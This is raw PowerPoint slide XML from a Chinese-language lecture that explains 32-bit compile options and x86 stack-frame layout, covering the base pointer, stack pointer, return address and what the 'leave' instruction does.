        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="4387793"/>
            <a:ext cx="101252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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>參數：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>開啟</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>debug</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> 模式（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>請都加這個選項，才會有格外輔助資訊）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>輸出檔案位子</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>m32</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> 用 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>位元方式去編譯（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>64</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>位元結構又不一樣，比較難）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-TW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995576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FA9C07A6-B4F1-714D-B684-DCF8CA48C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93" b="5274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10583"/>
            <a:ext cx="6803136" cy="4150439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ADF5F9-2C8A-5E42-A684-05FB13EF3D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569112" y="1661975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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824222BD-FBA4-0B45-B59A-EB421C78A5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780930" y="1600610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1" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C199D0FF-D518-6940-8499-A7C05EBE75F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654461" y="4679213"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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2" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3DEA90-648D-2C42-B38C-CA7C75F433B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654460" y="4191019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Return</a:t>
            </a:r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Address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F69AEB2-2022-BB4C-A34B-411A730B8DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526536" y="4407214"/>
            <a:ext cx="2384437" cy="8925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B8C736B-1F9F-B347-94C6-D3BBBAA8D902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3689130" y="4407214"/>
            <a:ext cx="21064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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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位子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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EA517597-4BDE-034A-A592-3BDA66B47613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795617" y="4564575"/>
            <a:ext cx="1816308" cy="1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FC17F0B-F3E9-8B4B-BDFB-49C2CB07EBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572692" y="4425308"/>
            <a:ext cx="2483294" cy="149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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>leave</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> 退出</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>子程式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>指令等於：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p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err="1"/>
              <a:t>esp,ebp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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5B4787-A784-7844-A84E-D03C36D8B95E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236043" y="4637196"/>
            <a:ext cx="3571519" cy="39547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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8C51759-AD3A-1E45-B0A3-A90C22DC95F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2279904" y="3697722"/>
            <a:ext cx="768096" cy="747697"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF3399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正方形/長方形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30B6DEDC-1872-714A-AD86-555FF130EA15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9807563" y="3121171"/>
            <a:ext cx="2384437" cy="916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9" name="テキスト ボックス 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{973FC834-9ED6-3C4C-80AA-4A99C5D15817}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9931022" y="3144760"/>
            <a:ext cx="21375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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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0" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4C84CC9-DD2A-FA4B-B0FF-EB6620A2D032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7651152" y="3185392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kumimoji="1" lang="zh-TW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zh-TW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1" name="正方形/長方形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A471A24-C44D-844A-8BFA-7015D2BB452D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643142" y="3673338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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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32" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81842693-964D-7D4B-A5DB-CC7B38B2EB29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9383455" y="3374427"/>
            <a:ext cx="638710" cy="12838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線矢印コネクタ 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E8C6FA-BF2D-D349-B49D-F24359508DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1868397" y="3871452"/>
            <a:ext cx="8062625" cy="12585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コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B02A241-DB58-404F-A087-A1F274260797}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6044390" y="3587041"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF0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94AEF312-2839-4347-9D50-EC27F2CAFD1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3732622"/>
            <a:ext cx="680313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0883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FA9C07A6-B4F1-714D-B684-DCF8CA48C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93" b="5274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10583"/>
            <a:ext cx="6803136" cy="4150439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ADF5F9-2C8A-5E42-A684-05FB13EF3D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569112" y="1661975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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824222BD-FBA4-0B45-B59A-EB421C78A5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780930" y="1600610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1" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C199D0FF-D518-6940-8499-A7C05EBE75F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654461" y="4679213"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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2" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3DEA90-648D-2C42-B38C-CA7C75F433B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654460" y="4191019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Return</a:t>
            </a:r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Address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F69AEB2-2022-BB4C-A34B-411A730B8DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526536" y="4407214"/>
            <a:ext cx="2384437" cy="8925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B8C736B-1F9F-B347-94C6-D3BBBAA8D902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3689130" y="4407214"/>
            <a:ext cx="22218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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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位子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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EA517597-4BDE-034A-A592-3BDA66B47613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795617" y="4564575"/>
            <a:ext cx="1816308" cy="1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FC17F0B-F3E9-8B4B-BDFB-49C2CB07EBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572692" y="4425308"/>
            <a:ext cx="2483294" cy="149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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>leave</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>  退出子程式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>指令等於：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p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err="1"/>
              <a:t>esp,ebp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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="正方形/長方形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C010FA-E058-CB49-BAD0-07FBCD4C4076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9931023" y="4421830"/>
            <a:ext cx="2384437" cy="916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14" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{600F4C94-7AF7-4045-8DC2-AF3E06899A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9506915" y="4675086"/>
            <a:ext cx="638710" cy="12838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テキスト ボックス 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF892013-7C7E-0C43-A0A8-94225EBFB897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10054482" y="4445419"/>
            <a:ext cx="21375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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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3" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5B4787-A784-7844-A84E-D03C36D8B95E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236043" y="4637196"/>
            <a:ext cx="3571519" cy="39547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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E8C6FA-BF2D-D349-B49D-F24359508DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2060448" y="5183827"/>
            <a:ext cx="7870575" cy="93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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF8B8631-A914-274F-9CBD-2B05A5ACD025}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2279904" y="3697722"/>
            <a:ext cx="768096" cy="747697"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
